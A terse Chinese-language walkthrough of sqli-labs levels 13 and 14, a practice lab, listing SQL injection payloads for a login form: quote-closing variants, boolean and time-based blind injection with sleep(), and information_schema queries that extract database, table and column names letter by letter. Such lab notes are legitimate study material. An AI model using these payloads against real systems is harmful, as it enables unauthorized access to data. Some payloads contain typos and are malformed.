less13
首先 和12关一样输入用户名和密码 12关会有回显 13关没有回显内容
uname=admin &passwd=admin&submit=Submit 此时只是显示登陆成功,但是不会显示其他的信息。
将用户名换成其他 则登录失败 uname=adm & passwd=admin & submit=Submit
uname=adm ' or 1=1 # & passwd=admin & submit=Submit 会出现错误语句的提示
直接通过报错信息知道了如何构造 构造:1’) or 1=1#
假设有俩列 uname=adm ') or union select 1,2, # & passwd=admin & submit=Submit 有错误
猜数据库:
没有回显信息 考虑使用盲注
uname=adm ') or if(length(database())>7,1,sleep(5)) # & passwd=admin & submit=Submit
if(length(database())>8,1,sleep(5)) >8则显示正在连接 没有立即返回 猜出数据库名长度是8
uname=adm ') or left(database(),1) >'a' # 判断数据库的第一位
或者使用uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit
手动输入比较困难 我们使用暴力破解
uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #&passwd=admin&submit=Submit
猜出第一个字母是i
flag.jpg则显示登录成功
接下来判断第2位
以此类推 猜出345。。位数据库名字
less14
uname=admin &passwd=admin&submit=Submit
uname=admin '# &passwd=admin&submit=Submit
uname=admin " # &passwd=admin&submit=Submit
uname=admi" or length(database())='8'#&passwd=admin&submit=Submit
13关 是’)
14关是 ”
15关是 '
16关是 ”)
查询语句
uname=admi" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='a'#&passwd=admin&submit=Submit
uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit
判断长度
uname = adminadmin&passwd=admiand") or if(length(database())>1,1,sleep(5))#&submit=Submit通过这个来判断其长度
uname=adminadmin&passwd=admiand”) or if(length()>1000,1,sleep(5))#&submit=Submit